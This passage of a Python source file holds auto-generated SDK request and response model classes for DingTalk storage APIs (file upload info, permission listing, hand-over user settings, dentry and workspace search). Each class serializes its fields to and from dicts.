            self.internal_resource_urls = m.get('internalResourceUrls')
        if m.get('region') is not None:
            self.region = m.get('region')
        if m.get('resourceUrls') is not None:
            self.resource_urls = m.get('resourceUrls')
        return self
class GetFileUploadInfoResponseBody(TeaModel):
    """Response body for GetFileUploadInfo: signature info, protocol, storage
    driver, and the upload key used later by CommitFile."""
    def __init__(
        self,
        header_signature_info: GetFileUploadInfoResponseBodyHeaderSignatureInfo = None,
        protocol: str = None,
        storage_driver: str = None,
        upload_key: str = None,
    ):
        self.header_signature_info = header_signature_info
        self.protocol = protocol
        self.storage_driver = storage_driver
        self.upload_key = upload_key
    def validate(self):
        """Validate the nested signature-info model if present."""
        if self.header_signature_info:
            self.header_signature_info.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.header_signature_info is not None:
            result['headerSignatureInfo'] = self.header_signature_info.to_map()
        if self.protocol is not None:
            result['protocol'] = self.protocol
        if self.storage_driver is not None:
            result['storageDriver'] = self.storage_driver
        if self.upload_key is not None:
            result['uploadKey'] = self.upload_key
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('headerSignatureInfo') is not None:
            temp_model = GetFileUploadInfoResponseBodyHeaderSignatureInfo()
            self.header_signature_info = temp_model.from_map(m['headerSignatureInfo'])
        if m.get('protocol') is not None:
            self.protocol = m.get('protocol')
        if m.get('storageDriver') is not None:
            self.storage_driver = m.get('storageDriver')
        if m.get('uploadKey') is not None:
            self.upload_key = m.get('uploadKey')
        return self
class GetFileUploadInfoResponse(TeaModel):
    """Full GetFileUploadInfo HTTP response: headers, status code, and parsed body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: GetFileUploadInfoResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body
    def validate(self):
        """Require headers/status_code/body and validate the nested body."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.status_code is not None:
            result['statusCode'] = self.status_code
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            temp_model = GetFileUploadInfoResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
class GetPermissionInheritanceHeaders(TeaModel):
    """Request headers for the GetPermissionInheritance API: common headers
    plus the DingTalk access token."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire header names, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict keyed by wire header names; return self."""
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class GetPermissionInheritanceRequest(TeaModel):
    """Request for GetPermissionInheritance: just the operator's unionId."""
    def __init__(
        self,
        union_id: str = None,
    ):
        self.union_id = union_id
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.union_id is not None:
            result['unionId'] = self.union_id
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; return self."""
        m = m or dict()
        if m.get('unionId') is not None:
            self.union_id = m.get('unionId')
        return self
class GetPermissionInheritanceResponseBody(TeaModel):
    """Response body for GetPermissionInheritance: the inheritance setting
    as a string."""
    def __init__(
        self,
        inheritance: str = None,
    ):
        self.inheritance = inheritance
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.inheritance is not None:
            result['inheritance'] = self.inheritance
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; return self."""
        m = m or dict()
        if m.get('inheritance') is not None:
            self.inheritance = m.get('inheritance')
        return self
class GetPermissionInheritanceResponse(TeaModel):
    """Full GetPermissionInheritance HTTP response: headers, status code, and
    parsed body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: GetPermissionInheritanceResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body
    def validate(self):
        """Require headers/status_code/body and validate the nested body."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.status_code is not None:
            result['statusCode'] = self.status_code
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            temp_model = GetPermissionInheritanceResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
class ListPermissionsHeaders(TeaModel):
    """Request headers for the ListPermissions API: common headers plus the
    DingTalk access token."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire header names, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict keyed by wire header names; return self."""
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class ListPermissionsRequestOption(TeaModel):
    """Paging/filter options for ListPermissions: role-id filter, page size,
    and pagination token."""
    def __init__(
        self,
        filter_role_ids: List[str] = None,
        max_results: int = None,
        next_token: str = None,
    ):
        self.filter_role_ids = filter_role_ids
        self.max_results = max_results
        self.next_token = next_token
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.filter_role_ids is not None:
            result['filterRoleIds'] = self.filter_role_ids
        if self.max_results is not None:
            result['maxResults'] = self.max_results
        if self.next_token is not None:
            result['nextToken'] = self.next_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('filterRoleIds') is not None:
            self.filter_role_ids = m.get('filterRoleIds')
        if m.get('maxResults') is not None:
            self.max_results = m.get('maxResults')
        if m.get('nextToken') is not None:
            self.next_token = m.get('nextToken')
        return self
class ListPermissionsRequest(TeaModel):
    """Request payload for ListPermissions."""

    def __init__(
        self,
        option: ListPermissionsRequestOption = None,
        union_id: str = None,
    ):
        self.option = option
        self.union_id = union_id

    def validate(self):
        # Only the nested option model carries its own validation.
        if self.option:
            self.option.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.option is not None:
            out['option'] = self.option.to_map()
        if self.union_id is not None:
            out['unionId'] = self.union_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('option') is not None:
            self.option = ListPermissionsRequestOption().from_map(m['option'])
        if m.get('unionId') is not None:
            self.union_id = m.get('unionId')
        return self
class ListPermissionsResponseBodyPermissionsMember(TeaModel):
    """Member holding a permission (identified by corp, id and type)."""

    def __init__(
        self,
        corp_id: str = None,
        id: str = None,
        type: str = None,
    ):
        self.corp_id = corp_id
        self.id = id
        self.type = type

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.corp_id is not None:
            out['corpId'] = self.corp_id
        if self.id is not None:
            out['id'] = self.id
        if self.type is not None:
            out['type'] = self.type
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('corpId') is not None:
            self.corp_id = m.get('corpId')
        if m.get('id') is not None:
            self.id = m.get('id')
        if m.get('type') is not None:
            self.type = m.get('type')
        return self
class ListPermissionsResponseBodyPermissionsRole(TeaModel):
    """Role attached to a permission entry."""

    def __init__(
        self,
        id: str = None,
        name: str = None,
    ):
        self.id = id
        self.name = name

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.id is not None:
            out['id'] = self.id
        if self.name is not None:
            out['name'] = self.name
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('id') is not None:
            self.id = m.get('id')
        if m.get('name') is not None:
            self.name = m.get('name')
        return self
class ListPermissionsResponseBodyPermissions(TeaModel):
    """A single permission entry: target dentry, duration, member and role."""

    def __init__(
        self,
        dentry_uuid: str = None,
        duration: int = None,
        member: ListPermissionsResponseBodyPermissionsMember = None,
        role: ListPermissionsResponseBodyPermissionsRole = None,
    ):
        self.dentry_uuid = dentry_uuid
        self.duration = duration
        self.member = member
        self.role = role

    def validate(self):
        # Delegate to the nested models when present.
        for nested in (self.member, self.role):
            if nested:
                nested.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.dentry_uuid is not None:
            out['dentryUuid'] = self.dentry_uuid
        if self.duration is not None:
            out['duration'] = self.duration
        if self.member is not None:
            out['member'] = self.member.to_map()
        if self.role is not None:
            out['role'] = self.role.to_map()
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('dentryUuid') is not None:
            self.dentry_uuid = m.get('dentryUuid')
        if m.get('duration') is not None:
            self.duration = m.get('duration')
        if m.get('member') is not None:
            self.member = ListPermissionsResponseBodyPermissionsMember().from_map(m['member'])
        if m.get('role') is not None:
            self.role = ListPermissionsResponseBodyPermissionsRole().from_map(m['role'])
        return self
class ListPermissionsResponseBody(TeaModel):
    """ListPermissions result: a page of permission entries plus a paging token."""

    def __init__(
        self,
        next_token: str = None,
        permissions: List[ListPermissionsResponseBodyPermissions] = None,
    ):
        self.next_token = next_token
        self.permissions = permissions

    def validate(self):
        for entry in (self.permissions or []):
            if entry:
                entry.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.next_token is not None:
            out['nextToken'] = self.next_token
        # The generator always emits the list key, even when unset.
        out['permissions'] = [] if self.permissions is None else [
            entry.to_map() if entry else None for entry in self.permissions
        ]
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('nextToken') is not None:
            self.next_token = m.get('nextToken')
        self.permissions = []
        if m.get('permissions') is not None:
            self.permissions = [
                ListPermissionsResponseBodyPermissions().from_map(entry)
                for entry in m.get('permissions')
            ]
        return self
class ListPermissionsResponse(TeaModel):
    """HTTP envelope for the ListPermissions response."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: ListPermissionsResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body

    def validate(self):
        # All envelope parts are required once the call has completed.
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.headers is not None:
            out['headers'] = self.headers
        if self.status_code is not None:
            out['statusCode'] = self.status_code
        if self.body is not None:
            out['body'] = self.body.to_map()
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            self.body = ListPermissionsResponseBody().from_map(m['body'])
        return self
class ManagerGetDefaultHandOverUserHeaders(TeaModel):
    """Custom headers carried on the ManagerGetDefaultHandOverUser call."""

    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.common_headers is not None:
            out['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            out['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class ManagerGetDefaultHandOverUserRequest(TeaModel):
    """Request payload for ManagerGetDefaultHandOverUser."""

    def __init__(
        self,
        operator_id: str = None,
    ):
        self.operator_id = operator_id

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.operator_id is not None:
            out['operatorId'] = self.operator_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('operatorId') is not None:
            self.operator_id = m.get('operatorId')
        return self
class ManagerGetDefaultHandOverUserResponseBody(TeaModel):
    """ManagerGetDefaultHandOverUser result: the configured hand-over user id."""

    def __init__(
        self,
        default_handover_user_id: str = None,
    ):
        self.default_handover_user_id = default_handover_user_id

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.default_handover_user_id is not None:
            out['defaultHandoverUserId'] = self.default_handover_user_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('defaultHandoverUserId') is not None:
            self.default_handover_user_id = m.get('defaultHandoverUserId')
        return self
class ManagerGetDefaultHandOverUserResponse(TeaModel):
    """HTTP envelope for the ManagerGetDefaultHandOverUser response."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: ManagerGetDefaultHandOverUserResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body

    def validate(self):
        # All envelope parts are required once the call has completed.
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.headers is not None:
            out['headers'] = self.headers
        if self.status_code is not None:
            out['statusCode'] = self.status_code
        if self.body is not None:
            out['body'] = self.body.to_map()
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            self.body = ManagerGetDefaultHandOverUserResponseBody().from_map(m['body'])
        return self
class ManagerSetDefaultHandOverUserHeaders(TeaModel):
    """Custom headers carried on the ManagerSetDefaultHandOverUser call."""

    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.common_headers is not None:
            out['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            out['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class ManagerSetDefaultHandOverUserRequest(TeaModel):
    """Request payload for ManagerSetDefaultHandOverUser."""

    def __init__(
        self,
        default_handover_user_id: str = None,
        operator_id: str = None,
    ):
        self.default_handover_user_id = default_handover_user_id
        self.operator_id = operator_id

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.default_handover_user_id is not None:
            out['defaultHandoverUserId'] = self.default_handover_user_id
        if self.operator_id is not None:
            out['operatorId'] = self.operator_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('defaultHandoverUserId') is not None:
            self.default_handover_user_id = m.get('defaultHandoverUserId')
        if m.get('operatorId') is not None:
            self.operator_id = m.get('operatorId')
        return self
class ManagerSetDefaultHandOverUserResponseBody(TeaModel):
    """ManagerSetDefaultHandOverUser result: a success flag."""

    def __init__(
        self,
        success: bool = None,
    ):
        self.success = success

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.success is not None:
            out['success'] = self.success
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('success') is not None:
            self.success = m.get('success')
        return self
class ManagerSetDefaultHandOverUserResponse(TeaModel):
    """HTTP envelope for the ManagerSetDefaultHandOverUser response."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: ManagerSetDefaultHandOverUserResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body

    def validate(self):
        # All envelope parts are required once the call has completed.
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.headers is not None:
            out['headers'] = self.headers
        if self.status_code is not None:
            out['statusCode'] = self.status_code
        if self.body is not None:
            out['body'] = self.body.to_map()
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            self.body = ManagerSetDefaultHandOverUserResponseBody().from_map(m['body'])
        return self
class SearchDentriesHeaders(TeaModel):
    """Custom headers carried on the SearchDentries call."""

    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.common_headers is not None:
            out['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            out['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class SearchDentriesRequestOptionCreateTimeRange(TeaModel):
    """Creation-time filter window (start/end timestamps) for SearchDentries."""

    def __init__(
        self,
        end_time: int = None,
        start_time: int = None,
    ):
        self.end_time = end_time
        self.start_time = start_time

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.end_time is not None:
            out['endTime'] = self.end_time
        if self.start_time is not None:
            out['startTime'] = self.start_time
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('endTime') is not None:
            self.end_time = m.get('endTime')
        if m.get('startTime') is not None:
            self.start_time = m.get('startTime')
        return self
class SearchDentriesRequestOptionVisitTimeRange(TeaModel):
    """Visit-time filter window (start/end timestamps) for SearchDentries."""

    def __init__(
        self,
        end_time: int = None,
        start_time: int = None,
    ):
        self.end_time = end_time
        self.start_time = start_time

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.end_time is not None:
            out['endTime'] = self.end_time
        if self.start_time is not None:
            out['startTime'] = self.start_time
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('endTime') is not None:
            self.end_time = m.get('endTime')
        if m.get('startTime') is not None:
            self.start_time = m.get('startTime')
        return self
class SearchDentriesRequestOption(TeaModel):
    """Filter and paging options for a SearchDentries request."""

    def __init__(
        self,
        create_time_range: SearchDentriesRequestOptionCreateTimeRange = None,
        creator_ids: List[str] = None,
        dentry_categories: List[str] = None,
        max_results: int = None,
        modifier_ids: List[str] = None,
        next_token: str = None,
        visit_time_range: SearchDentriesRequestOptionVisitTimeRange = None,
    ):
        self.create_time_range = create_time_range
        self.creator_ids = creator_ids
        self.dentry_categories = dentry_categories
        self.max_results = max_results
        self.modifier_ids = modifier_ids
        self.next_token = next_token
        self.visit_time_range = visit_time_range

    def validate(self):
        # Only the nested time-range models carry their own validation.
        for nested in (self.create_time_range, self.visit_time_range):
            if nested:
                nested.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.create_time_range is not None:
            out['createTimeRange'] = self.create_time_range.to_map()
        if self.creator_ids is not None:
            out['creatorIds'] = self.creator_ids
        if self.dentry_categories is not None:
            out['dentryCategories'] = self.dentry_categories
        if self.max_results is not None:
            out['maxResults'] = self.max_results
        if self.modifier_ids is not None:
            out['modifierIds'] = self.modifier_ids
        if self.next_token is not None:
            out['nextToken'] = self.next_token
        if self.visit_time_range is not None:
            out['visitTimeRange'] = self.visit_time_range.to_map()
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('createTimeRange') is not None:
            self.create_time_range = SearchDentriesRequestOptionCreateTimeRange().from_map(m['createTimeRange'])
        if m.get('creatorIds') is not None:
            self.creator_ids = m.get('creatorIds')
        if m.get('dentryCategories') is not None:
            self.dentry_categories = m.get('dentryCategories')
        if m.get('maxResults') is not None:
            self.max_results = m.get('maxResults')
        if m.get('modifierIds') is not None:
            self.modifier_ids = m.get('modifierIds')
        if m.get('nextToken') is not None:
            self.next_token = m.get('nextToken')
        if m.get('visitTimeRange') is not None:
            self.visit_time_range = SearchDentriesRequestOptionVisitTimeRange().from_map(m['visitTimeRange'])
        return self
class SearchDentriesRequest(TeaModel):
    """Request payload for SearchDentries (keyword search over dentries)."""

    def __init__(
        self,
        keyword: str = None,
        option: SearchDentriesRequestOption = None,
        operator_id: str = None,
    ):
        self.keyword = keyword
        self.option = option
        self.operator_id = operator_id

    def validate(self):
        if self.option:
            self.option.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.keyword is not None:
            out['keyword'] = self.keyword
        if self.option is not None:
            out['option'] = self.option.to_map()
        if self.operator_id is not None:
            out['operatorId'] = self.operator_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('keyword') is not None:
            self.keyword = m.get('keyword')
        if m.get('option') is not None:
            self.option = SearchDentriesRequestOption().from_map(m['option'])
        if m.get('operatorId') is not None:
            self.operator_id = m.get('operatorId')
        return self
class SearchDentriesResponseBodyItemsCreator(TeaModel):
    """Creator of a dentry hit (display name and user id)."""

    def __init__(
        self,
        name: str = None,
        user_id: str = None,
    ):
        self.name = name
        self.user_id = user_id

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.name is not None:
            out['name'] = self.name
        if self.user_id is not None:
            out['userId'] = self.user_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('userId') is not None:
            self.user_id = m.get('userId')
        return self
class SearchDentriesResponseBodyItemsModifier(TeaModel):
    """Last modifier of a dentry hit (display name and user id)."""

    def __init__(
        self,
        name: str = None,
        user_id: str = None,
    ):
        self.name = name
        self.user_id = user_id

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.name is not None:
            out['name'] = self.name
        if self.user_id is not None:
            out['userId'] = self.user_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('userId') is not None:
            self.user_id = m.get('userId')
        return self
class SearchDentriesResponseBodyItems(TeaModel):
    """A single dentry search hit: uuid, name, creator and modifier."""

    def __init__(
        self,
        creator: SearchDentriesResponseBodyItemsCreator = None,
        dentry_uuid: str = None,
        modifier: SearchDentriesResponseBodyItemsModifier = None,
        name: str = None,
    ):
        self.creator = creator
        self.dentry_uuid = dentry_uuid
        self.modifier = modifier
        self.name = name

    def validate(self):
        for nested in (self.creator, self.modifier):
            if nested:
                nested.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.creator is not None:
            out['creator'] = self.creator.to_map()
        if self.dentry_uuid is not None:
            out['dentryUuid'] = self.dentry_uuid
        if self.modifier is not None:
            out['modifier'] = self.modifier.to_map()
        if self.name is not None:
            out['name'] = self.name
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('creator') is not None:
            self.creator = SearchDentriesResponseBodyItemsCreator().from_map(m['creator'])
        if m.get('dentryUuid') is not None:
            self.dentry_uuid = m.get('dentryUuid')
        if m.get('modifier') is not None:
            self.modifier = SearchDentriesResponseBodyItemsModifier().from_map(m['modifier'])
        if m.get('name') is not None:
            self.name = m.get('name')
        return self
class SearchDentriesResponseBody(TeaModel):
    """SearchDentries result: a page of hits plus a paging token."""

    def __init__(
        self,
        items: List[SearchDentriesResponseBodyItems] = None,
        next_token: str = None,
    ):
        self.items = items
        self.next_token = next_token

    def validate(self):
        for entry in (self.items or []):
            if entry:
                entry.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        # The generator always emits the list key, even when unset.
        out['items'] = [] if self.items is None else [
            entry.to_map() if entry else None for entry in self.items
        ]
        if self.next_token is not None:
            out['nextToken'] = self.next_token
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        self.items = []
        if m.get('items') is not None:
            self.items = [
                SearchDentriesResponseBodyItems().from_map(entry)
                for entry in m.get('items')
            ]
        if m.get('nextToken') is not None:
            self.next_token = m.get('nextToken')
        return self
class SearchDentriesResponse(TeaModel):
    """HTTP envelope for the SearchDentries response."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: SearchDentriesResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body

    def validate(self):
        # All envelope parts are required once the call has completed.
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.headers is not None:
            out['headers'] = self.headers
        if self.status_code is not None:
            out['statusCode'] = self.status_code
        if self.body is not None:
            out['body'] = self.body.to_map()
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            self.body = SearchDentriesResponseBody().from_map(m['body'])
        return self
class SearchWorkspacesHeaders(TeaModel):
    """Custom headers carried on the SearchWorkspaces call."""

    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.common_headers is not None:
            out['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            out['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class SearchWorkspacesRequestOption(TeaModel):
    """Paging options for a SearchWorkspaces request."""

    def __init__(
        self,
        max_results: int = None,
        next_token: str = None,
    ):
        self.max_results = max_results
        self.next_token = next_token

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.max_results is not None:
            out['maxResults'] = self.max_results
        if self.next_token is not None:
            out['nextToken'] = self.next_token
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('maxResults') is not None:
            self.max_results = m.get('maxResults')
        if m.get('nextToken') is not None:
            self.next_token = m.get('nextToken')
        return self
class SearchWorkspacesRequest(TeaModel):
